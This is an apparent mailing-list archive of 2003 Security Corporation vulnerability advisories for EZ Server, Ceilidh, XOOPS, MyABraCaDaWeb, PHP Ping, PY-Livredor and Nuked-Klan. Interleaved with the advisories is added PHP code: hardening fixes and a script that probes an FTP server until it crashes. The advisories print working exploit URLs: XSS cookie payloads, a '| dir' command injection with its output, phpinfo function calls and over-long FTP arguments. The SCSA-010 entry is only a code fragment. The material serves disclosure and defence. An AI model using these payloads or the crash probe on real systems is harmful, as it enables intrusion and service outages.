[SCSA-014] Remote Denial of Service Vulnerability in EZ Server

2003-03-31 Thread Grégory


==
Security Corporation Security Advisory [SCSA-014]

Remote Denial of Service Vulnerability in EZ Server
==

PROGRAM: EZ Server 
HOMEPAGE: http://www.html-helper.com
VULNERABLE VERSIONS: 1.0 and prior ?
RISK: Medium/High
IMPACT: Denial Of Service
RELEASE DATE: 2003-03-31

==
TABLE OF CONTENTS
==

1. DESCRIPTION
2. DETAILS
3. EXPLOIT
4. SOLUTIONS
5. VENDOR STATUS
6. CREDITS
7. DISCLAIMER
8. REFERENCES
9. FEEDBACK

1. DESCRIPTION
==

EZ Server is a compact multi-threaded server that has both HTTP and FTP
built right into it. (direct quote from http://www.html-helper.com)

 
2. DETAILS
==

¤ Remote DoS :

A security vulnerability in the EZ FTP server allows remote attackers to
cause the server to crash by executing a specific command (the ls or cd
command) with an argument of 1994 or 1995 bytes in length or more.

The command can be issued to the FTP server either by a valid 
authenticated user or by the anonymous account (if this is enabled). 


3. EXPLOIT
==

The following is an example of what should be done to accomplish the 
Denial of Service attack:

- With the ls command:

C:\>ftp target
Connected to target.
220 EZ FTP Server ready.
User (target:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> ls AAAAAAAAAAAAAAAAAAAA[...]AAAAAAAAAAAAAAAAAAAA

(the argument is a run of 1994 or 1995 A's or more; only its start and
end are shown here)


- With the cd command:

C:\>ftp target
Connected to target.
220 EZ FTP Server ready.
User (target:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> cd AAAAAAAAAAAAAAAAAAAA[...]AAAAAAAAAAAAAAAAAAAA

(same argument as above: 1994 or 1995 A's or more)
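The check above, scripted, as an added example that is not part of the advisory: a PHP probe that logs in anonymously, sends the over-long argument and reports whether the server still answers. Windows ftp.exe sends `cd` as CWD and `ls` as NLST, so those are the verbs used on the wire. The host name, port and anonymous password are placeholders. Because this is a crash test, run it only against a server you are authorised to take down.

```php
<?php
// Added example, not code from the advisory: send an over-long CWD / NLST
// argument to an FTP server and report whether it survives, the check
// SCSA-014 describes for EZ Server. Host, port and the anonymous password
// are placeholders.

function ftp_read_reply($fp): ?string
{
    // Read one RFC 959 reply, possibly multi-line ("220-..." continues,
    // "220 ..." ends it). Returns null when no complete reply arrives.
    $last = null;
    while (($line = fgets($fp, 4096)) !== false) {
        $last = rtrim($line, "\r\n");
        if (preg_match('/^\d{3} /', $last)) {
            return $last;
        }
    }
    return null;
}

function ftp_send($fp, string $cmd): ?string
{
    // @ silences the notice PHP raises when writing to a socket the
    // server has already closed; null is the "no answer" signal.
    if (@fwrite($fp, $cmd . "\r\n") === false) {
        return null;
    }
    return ftp_read_reply($fp);
}

function ftp_long_arg_probe(string $host, int $port, string $verb, int $len): array
{
    $fp = @fsockopen($host, $port, $errno, $errstr, 5);
    if ($fp === false) {
        return ['stage' => 'connect', 'alive' => false, 'reply' => $errstr];
    }
    stream_set_timeout($fp, 5);
    $banner = ftp_read_reply($fp);
    ftp_send($fp, 'USER anonymous');
    $login = ftp_send($fp, 'PASS probe@example.invalid');
    if ($login === null || strncmp($login, '230', 3) !== 0) {
        fclose($fp);
        return ['stage' => 'login', 'alive' => $login !== null, 'reply' => $login ?? $banner];
    }
    $reply = ftp_send($fp, $verb . ' ' . str_repeat('A', $len));
    // A healthy server answers the probe (typically 550 for a directory
    // that does not exist) and the NOOP after it; a crashed one drops the
    // socket, so one of the two comes back null.
    $alive = $reply !== null && ftp_send($fp, 'NOOP') !== null;
    fclose($fp);
    return ['stage' => 'probe', 'alive' => $alive, 'reply' => $reply];
}

// The advisory puts the threshold at 1994/1995 bytes, so bracket it.
foreach ([1993, 1994, 1995, 2048] as $len) {
    foreach (['CWD', 'NLST'] as $verb) {
        $r = ftp_long_arg_probe('target.example.invalid', 21, $verb, $len);
        printf("%-4s %4d bytes: %s (%s)\n", $verb, $len,
            $r['stage'] !== 'probe' ? 'failed at ' . $r['stage']
                : ($r['alive'] ? 'server alive' : 'server gone'),
            $r['reply'] ?? 'no reply');
        if ($r['stage'] === 'probe' && !$r['alive']) {
            break 2;   // service is down; further probes only hit a dead port
        }
    }
}
```

The NOOP after the probe matters: some servers answer the over-long command and only die while processing it, so a single reply is not proof the service survived.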
Re: [SCSA-011] Path Disclosure Vulnerability in XOOPS

2003-03-28 Thread Grégory
In-Reply-To: [EMAIL PROTECTED]

You can fix the path disclosure problem by adding this code to all the
affected files:

---snip---
error_reporting(0); 
---snip---

Greetz : Magistrat (http://www.blocus-zone.com)




Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com
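One way to keep the path out of the response without also losing the diagnostics, as an added example that is not code from the reply above or from XOOPS: display_errors off, log_errors on, and an error handler that writes the file and line to the server log only. The `$handlers` map and the page functions are placeholders standing in for XOOPS' dispatch code, which is not reproduced here.

```php
<?php
// Added example, not code from the reply or from XOOPS: keep PHP error
// messages (which carry the script's filesystem path) out of the HTTP
// response without throwing the diagnostics away. error_reporting(0)
// also hides them from the log; this routes them to error_log() instead.
// $handlers and the render_* functions are placeholders.

ini_set('display_errors', '0');   // nothing rendered into the page
ini_set('html_errors', '0');
ini_set('log_errors', '1');       // but everything recorded server-side
error_reporting(E_ALL);           // including notices, which is what the trigger produced

// Every PHP warning/notice goes through here: full detail to the log,
// and "return true" tells PHP the message has been handled, so it is
// not displayed.
set_error_handler(function (int $errno, string $errstr, string $errfile, int $errline): bool {
    error_log(sprintf('[xoops] %s in %s:%d (errno %d)', $errstr, $errfile, $errline, $errno));
    return true;
});

// Uncaught exceptions: same split between log detail and client message.
set_exception_handler(function (Throwable $e): void {
    error_log(sprintf('[xoops] uncaught %s: %s at %s:%d',
        get_class($e), $e->getMessage(), $e->getFile(), $e->getLine()));
    http_response_code(500);
    echo 'An internal error occurred.';
});

function render_home(): string   { return 'home page'; }
function render_search(): string { return 'search page'; }

// Request shaped like the advisory's trigger: index.php?xoopsOption=any_word
$handlers = ['home' => 'render_home', 'search' => 'render_search'];
$option   = $_GET['xoopsOption'] ?? 'home';

if (!isset($handlers[$option])) {
    // Reject unknown options explicitly rather than letting a missing
    // include or undefined function fail with a path-bearing message.
    http_response_code(404);
    echo 'Unknown page.';
    exit;
}

// With display_errors off, a notice raised inside a handler (say an
// undefined array key) lands in the log as "[xoops] ... in /path/index.php:NN"
// while the client sees only the page body.
echo $handlers[$option]();
```

The same three ini keys belong in php.ini or a per-directory .htaccess, so they hold even for scripts that never reach the handler registration.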




[SCSA-013] Cross Site Scripting vulnerability in testcgi.exe

2003-03-27 Thread Grégory




Security Corporation Security Advisory [SCSA-013]


PROGRAM: Ceilidh
HOMEPAGE: http://www.lilikoi.com
VULNERABLE VERSIONS: 2.70 and prior



DESCRIPTION


Ceilidh is a Web-based threaded discussion engine that features 
automatic text to HTML conversion, file attachment, e-mail 
notification, automatic message expiration, multiple levels of 
security and much more.
(direct quote from http://www.lilikoi.com) 


DETAILS & EXPLOITS


¤ Cross Site Scripting :

An exploitable bug was found in Ceilidh which causes script
execution on the client's computer when following a crafted URL.

This kind of attack, known as a Cross-Site Scripting vulnerability, is
present in the testcgi.exe file; an attacker can input specially crafted
links and/or other malicious scripts.

- Exploits : 

http://[target]/cgi-bin/testcgi.exe?[hostile_code]

The hostile code could be:

[script]alert("Cookie="+document.cookie)[/script]

(opens a window with the visitor's cookie.)

(replace [ ] by < >)


SOLUTIONS


No solution for the moment.


VENDOR STATUS 


The vendor has reportedly been notified.


LINKS


- http://www.security-corp.org/index.php?ink=4-15-1

- French version:
http://www.security-corporation.com/index.php?id=advisories&a=013-FR



Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com





[SCSA-011] Path Disclosure Vulnerability in XOOPS

2003-03-20 Thread Grégory




Security Corporation Security Advisory [SCSA-011]


PROGRAM: XOOPS
HOMEPAGE: http://www.xoops.org/
VULNERABLE VERSIONS: v2.0 (and prior ?)


DESCRIPTION


XOOPS is a dynamic OO (Object Oriented) based open source portal script
written in PHP. XOOPS is the ideal tool for developing small to large
dynamic community websites, intra-company portals, corporate portals,
weblogs and much more. (direct quote from XOOPS website)


DETAILS & EXPLOITS


¤ Details Path Disclosure :

A vulnerability has been found in XOOPS which allows attackers to determine
the physical path of the application.

This vulnerability would allow a remote user to determine the full path to
the web root directory and other potentially sensitive information.
This vulnerability can be triggered by a remote user submitting a
specially crafted HTTP request including invalid input to the
$xoopsOption variable.

¤ Exploits Path Disclosure :

http://[target]/index.php?xoopsOption=any_word

Affected files:
admin.php
edituser.php
footer.php
header.php
image.php
lostpass.php
pmlite.php
readpmsg.php
register.php
search.php
user.php
userinfo.php
viewpmsg.php
class/xoopsblock.php
modules/contact/index.php
modules/mydownloads/index.php
modules/mydownloads/brokenfile.php
modules/mydownloads/modfile.php
modules/mydownloads/ratefile.php
modules/mydownloads/singlefile.php
modules/mydownloads/submit.php
modules/mydownloads/topten.php
modules/mydownloads/viewcat.php
modules/mylinks/brokenlink.php
modules/mylinks/index.php
modules/mylinks/modlink.php
modules/mylinks/ratelink.php
modules/mylinks/singlelink.php
modules/mylinks/submit.php
modules/mylinks/topten.php
modules/mylinks/viewcat.php
modules/newbb/index.php
modules/newbb/search.php
modules/newbb/viewforum.php
modules/newbb/viewtopic.php
modules/news/archive.php
modules/news/article.php
modules/news/index.php
modules/sections/index.php
modules/system/admin.php
modules/xoopsfaq/index.php
modules/xoopsheadlines/index.php
modules/xoopsmembers/index.php
modules/xoopspartners/index.php
modules/xoopspartners/join.php
modules/xoopspoll/index.php
modules/xoopspoll/pollresults.php

SOLUTIONS


No solution for the moment.


VENDOR STATUS


The vendor has reportedly been notified.


LINKS


French version:
http://www.security-corporation.com/index.php?id=advisories&a=011-FR



Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com



[SCSA-010] Path Disclosure Cross Site Scripting Vulnerability in MyABraCaDaWeb

2003-03-17 Thread Grégory
,"!document.cookie!",$ma_kw);
$ma_kw = eregi_replace("vbscript","!vbscript!",$ma_kw);
$ma_kw = eregi_replace("location","!location!",$ma_kw);
$ma_kw = eregi_replace("object","!object!",$ma_kw);
$ma_kw = eregi_replace("vbs","!vbs!",$ma_kw);
$ma_kw = eregi_replace("href","!href!",$ma_kw);
$vtp_p = new VTemplate;
$tpl_p = $vtp_p->Open("modules/pertinance/tpl/rapport.tpl");
$vtp_p->addSession($tpl_p,"rapport");
$vtp_p->setVar($tpl_p,"rapport.ma_kw",$ma_kw);
$vtp_p->setVar($tpl_p,"rapport.NbMotCle",$NbMotCle);
$vtp_p->setVar($tpl_p,"rapport.T3",$T3);
$vtp_p->setVar($tpl_p,"rapport.NbLiens",$NbLiens);
if(quel_groupe() == 4){
$sql = htmlentities($sql);
$sql = addslashes($sql);
$vtp_p->addSession($tpl_p,"sql");
$vtp_p->setVar($tpl_p,"sql.sql",$sql);
$vtp_p->closeSession($tpl_p,"sql");
}
$vtp_p->closeSession($tpl_p,"rapport");
$Raport = $vtp_p->Display($tpl_p,0);



VENDOR STATUS


The vendor has reportedly been notified. It is currently developing a patch.


LINKS


http://www.security-corporation.com/index.php?id=advisories&a=010

http://www.security-corp.org/index.php?ink=4-15-1

-
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com
-


[SCSA-009] Remote Command Execution Vulnerability in PHP Ping

2003-03-06 Thread Grégory




Security Corporation Security Advisory [SCSA-009]


PROGRAM: PHP Ping
HOMEPAGE: http://www.phpapps.org/
VULNERABLE VERSIONS: v0.1 and prior
 

DESCRIPTION


PHP ping will allow you, provided that your server runs under Windows,
to perform a ping on the host of your choice.

(direct quote from PHP Ping website)


DETAILS


A vulnerability has been found in PHP ping which allows attackers to
execute remote commands.

This vulnerability would allow a remote attacker to compromise parts of 
the operating system, possibly the complete operating system.

Vulnerable code :

<?php
//*
// PING FUNCTION
//*
function PHPing($cible,$pingFile){
exec("ping -a -n 1 $cible > $pingFile", $list);
$fd = fopen($pingFile, "r");
while(!feof($fd))
{
$ping.= fgets($fd,256);
}
fclose($fd);
return $ping;
}
//-
?>


EXPLOIT


The vulnerability was discovered in the page that executes the ping,
at this address:

http://[target]/phpping/index.php?pingto=www.security-corp.org%20|%20dir

This exploit simply shows the contents of the current directory:

c:\phpping

03/03/2003  23:01    <DIR>          .
03/03/2003  23:01    <DIR>          ..
03/03/2003  23:00    <DIR>          img
30/04/2002  23:13             3,217 index.php
30/04/2002  23:19               921 README
03/03/2003  23:03                 0 resultat.ping
               3 File(s)          4,138 bytes
               3 Dir(s)  11,413,962,752 bytes free


SOLUTIONS


For example, use this code:

<?php
//*
// PING FUNCTION
//*
function PHPing($cible,$pingFile){

# BugFix by Gregory LEBRAS www.security-corp.org

if( (!$cible) ||
(!preg_match("/^[\w\d\.\-]+\.[\w\d]{1,3}$/i",$cible)) ){
  echo("Error: Please specify a valid target host or IP.");
  exit;
}
else
{
$ping = "";
exec("ping -a -n 1 $cible > $pingFile", $list);
$fd = fopen($pingFile, "r");
while(!feof($fd))
{
$ping.= fgets($fd,256);
}
fclose($fd);
return $ping;
}
}
//
?>


VENDOR STATUS 


The vendor has reportedly been notified.


LINKS


French version:

http://www.security-corp.org/advisories/SCSA-009-FR.txt



Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
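A hardened PHPing(), as an added example that is neither PHP Ping's code nor the fix from the advisory: it keeps the idea of validating the target, but the control that actually prevents "| dir" from running is escapeshellarg(), and ping's output is taken straight from exec() instead of a temp file in the web root. The valid_ping_target() helper and the constructed target list are this example's own.

```php
<?php
// Added example, not PHP Ping's code and not the fix from the advisory:
// a PHPing() that validates the target and, independently of that,
// quotes it with escapeshellarg() so shell metacharacters are passed to
// ping as data. Helper names and the sample targets are placeholders.

function valid_ping_target(string $cible): bool
{
    // A literal IPv4/IPv6 address is accepted as-is ...
    if (filter_var($cible, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    // ... otherwise require a hostname: dot-separated labels of letters,
    // digits and hyphens. Unlike the advisory's regex this allows TLDs
    // longer than three characters. The D modifier makes $ match only at
    // the very end, so "host\n" is rejected (without D, $ also matches
    // before a trailing newline).
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    return strlen($cible) <= 253
        && preg_match("/^(?:{$label}\\.)*{$label}$/iD", $cible) === 1;
}

function PHPing(string $cible): string
{
    if (!valid_ping_target($cible)) {
        return 'Error: Please specify a valid target host or IP.';
    }
    // escapeshellarg() quotes the argument for the platform's shell;
    // "-n 1" keeps each request to one packet (Windows ping syntax, as in
    // the original script).
    $cmd = 'ping -a -n 1 ' . escapeshellarg($cible);
    exec($cmd, $lines, $status);
    return implode("\n", $lines);
}

// Constructed input: legitimate targets, the advisory's payload, and a
// value that the unanchored-newline trap would otherwise let through.
foreach (['www.security-corp.org', '127.0.0.1',
          'www.security-corp.org | dir', "www.security-corp.org\n"] as $target) {
    echo '== ', addcslashes($target, "\n"), " ==\n", PHPing($target), "\n\n";
}
```

Validation and quoting are kept separate on purpose: the regex limits what the page will ping at all, while escapeshellarg() guarantees that whatever reaches exec() is a single argument even if the regex is later relaxed.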



[SCSA-008] Cross Site Scripting Script Injection Vulnerability in PY-Livredor

2003-03-03 Thread Grégory




Security Corporation Security Advisory [SCSA-008]


PROGRAM: PY-Livredor
HOMEPAGE: http://www.py-scripts.com
   http://www.scripts-php.com
VULNERABLE VERSIONS: v1.0


DESCRIPTION


PY-Livredor is an easy guestbook script using PHP4 and MySQL with
an administration interface which allows message deletion.


DETAILS


A Cross-Site Scripting vulnerability has been found in PY-Livredor
which allows attackers to inject script code into the guestbook and run
it in clients' browsers as if it were provided by the website.

This Cross-Site Scripting vulnerability is found in the page for
posting messages (index.php).

An attacker can input specially crafted links and/or other
malicious scripts.


EXPLOIT


A vulnerability was discovered in the page for posting messages,
at this address:

http://[target]/livredor/index.php


The vulnerability lies in the handling of the titre,
Votre pseudo, Votre e-mail and Votre message fields.

Inserting a hostile script in these fields makes it
possible for a malicious user to run this script in the browsers
of the visitors.


The hostile code could be:

[script]alert("Cookie="+document.cookie)[/script]

(opens a window with the visitor's cookie.)

(replace [ ] by < >)


SOLUTIONS


No solution for the moment.


VENDOR STATUS


The vendor has reportedly been notified.


LINKS


http://www.security-corp.org/index.php?ink=4-15-1

French version:

http://www.security-corp.org/advisories/SCSA-008-FR.txt



Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
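What the fix for the guestbook fields looks like, as an added example that is not PY-Livredor's code: input is validated for shape only and HTML-encoded at output time, so the advisory's payload in titre, Votre pseudo, Votre e-mail or Votre message renders as text. The field keys, the in-memory $book array and the sample posts are this example's own placeholders for the script's form and MySQL table.

```php
<?php
// Added example, not PY-Livredor's code: accept guestbook input as data
// and HTML-encode it when rendering, so "<script>" in any field is shown
// rather than executed. Field keys and $book are placeholders.

function h(?string $s): string
{
    // ENT_QUOTES also encodes the single quote, so the result is safe in
    // attribute values; ENT_SUBSTITUTE keeps malformed UTF-8 from blanking
    // the whole string (which would hide the entry rather than the attack).
    return htmlspecialchars((string) $s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function validate_entry(array $post): array
{
    // Input-side checks are about shape (presence, length, e-mail syntax).
    // Stripping "<script>" here is not attempted: output encoding is what
    // makes the page safe, and it works for payloads a blacklist misses.
    $limits = ['titre' => 100, 'pseudo' => 40, 'email' => 254, 'message' => 4000];
    $entry  = [];
    foreach ($limits as $field => $max) {
        $value = trim((string) ($post[$field] ?? ''));
        if ($value === '' || strlen($value) > $max) {
            throw new InvalidArgumentException("$field is missing or too long");
        }
        $entry[$field] = $value;
    }
    if (filter_var($entry['email'], FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException('e-mail address is not valid');
    }
    return $entry;
}

function render_entry(array $e): string
{
    // Every user-controlled value goes through h(); nl2br() runs after
    // encoding so the <br> it inserts is the only markup in the message.
    return '<div class="msg">'
        . '<h3>' . h($e['titre']) . '</h3>'
        . '<p>by <a href="mailto:' . h($e['email']) . '">' . h($e['pseudo']) . '</a></p>'
        . '<p>' . nl2br(h($e['message'])) . '</p>'
        . "</div>\n";
}

// Constructed sample posts: the advisory's payload in the text fields, and
// one post that fails validation because the payload is in the e-mail field.
$payload = '<script>alert("Cookie="+document.cookie)</script>';
$posts = [
    ['titre' => $payload, 'pseudo' => $payload, 'email' => 'visitor@example.invalid',
     'message' => "first line\n" . $payload],
    ['titre' => 'hello', 'pseudo' => 'bob', 'email' => $payload, 'message' => 'hi'],
];
$book = [];
foreach ($posts as $post) {
    try {
        $book[] = validate_entry($post);
    } catch (InvalidArgumentException $ex) {
        echo 'rejected: ', h($ex->getMessage()), "\n";
    }
}
foreach ($book as $entry) {
    echo render_entry($entry);
}
```

Encoding belongs at the point of output because the same stored value may later be rendered in a different context (an RSS feed, an admin list, a JavaScript string), each of which needs its own encoding.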




[SCSA-006] XSS Function Execution Vulnerabilities in Nuked-Klan

2003-02-23 Thread Grégory




Security Corporation Security Advisory [SCSA-006]


PROGRAM: Nuked-Klan
HOMEPAGE: http://www.nuked-klan.org
VULNERABLE VERSIONS: beta 1.3
 


DESCRIPTION


Nuked Klan is a PHP Gateway for clans.

(direct quote from Nuked Klan website)


DETAILS & EXPLOITS


Many Cross-Site Scripting vulnerabilities have been found in Nuked Klan
which allow attackers to inject script code into the page and run it
in clients' browsers as if it were provided by the site.

These Cross-Site Scripting vulnerabilities are found in the following
modules: Team, News, Links (Liens).

An attacker can input specially crafted links and/or other
malicious scripts.

Moreover, this vulnerability allows an attacker to call certain
PHP functions.



Team


A vulnerability was discovered at this address:

XSS:


http://[target]/index.php?file=Team&op=<script>alert('Test');</script>


Function Execution:
---

http://[target]/index.php?file=Team&op=phpinfo

(calls phpinfo(), which outputs a lot of information about the PHP installation)


News



A vulnerability was discovered at this address:

XSS:


http://[target]/index.php?file=News&op=<script>alert('test');</script>


Function Execution:
---

http://[target]/index.php?file=News&op=phpinfo

(calls phpinfo(), which outputs a lot of information about the PHP installation)


Links


A vulnerability was discovered at this address:

XSS:


http://[target]/index.php?file=Liens&op=<script>alert('test');</script>


Function Execution:
---

http://[target]/index.php?file=Liens&op=phpinfo

(calls phpinfo(), which outputs a lot of information about the PHP installation)


SOLUTIONS


No solutions for the moment.


VENDOR STATUS 


The vendor has reportedly been notified. It is currently developing a patch.


LINKS


http://www.security-corp.org/index.php?ink=4-15-1

French version:

http://www.security-corp.org/advisories/SCSA-006-FR.txt



Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
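Why `op=phpinfo` runs phpinfo() and how a module dispatcher avoids it, as an added example that is not Nuked-Klan's code: the vulnerable pattern is an assumption about the module, reconstructed from the behaviour the advisory reports (any PHP function name in op gets called, anything else is echoed back unescaped), and the TeamModule class, its op names and its methods are placeholders.

```php
<?php
// Added example, not Nuked-Klan's code. dispatch_vulnerable() is an
// assumed reconstruction of the pattern behind "op=phpinfo" (a variable
// function call on request input); TeamModule shows the whitelist that
// replaces it. Op names and methods are placeholders.

// --- vulnerable pattern (assumed; do not use) ---
function dispatch_vulnerable(string $op): string
{
    if (function_exists($op)) {
        ob_start();
        $op();                                // op=phpinfo reaches here
        return (string) ob_get_clean();
    }
    return 'Unknown operation: ' . $op;       // reflected unescaped: op=<script>...
}

// --- hardened pattern ---
final class TeamModule
{
    // Only names listed here can ever be reached from the request; the
    // request value is a key into this table, never a callable itself.
    private const OPS = [
        'list' => 'opList',
        'show' => 'opShow',
    ];

    public function dispatch(array $query): string
    {
        $op = (string) ($query['op'] ?? 'list');
        if (!isset(self::OPS[$op])) {
            // Unknown op: fixed text, and the submitted value is encoded
            // before it is reflected, which closes the XSS vector too.
            http_response_code(400);
            return 'Unknown operation: ' . htmlspecialchars($op, ENT_QUOTES, 'UTF-8');
        }
        $method = self::OPS[$op];
        return $this->$method($query);
    }

    private function opList(array $q): string
    {
        return 'team list';
    }

    private function opShow(array $q): string
    {
        // Parameters are validated by type as well, not just the op name.
        $id = filter_var($q['id'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        return $id === false ? 'bad id' : "member $id";
    }
}

// Constructed requests mirroring the advisory's URLs. dispatch_vulnerable()
// is deliberately not called with "phpinfo" here; the hardened module
// answers all three without executing or reflecting anything.
$module = new TeamModule();
foreach (['phpinfo', "<script>alert('Test');</script>", 'show'] as $op) {
    echo "op=$op -> ", $module->dispatch(['op' => $op, 'id' => '7']), "\n";
}
```

The table lookup is the whole fix: with `isset(self::OPS[$op])` as the only path to a method name, `function_exists()`, `is_callable()` or a blacklist of dangerous names are not needed and would be weaker.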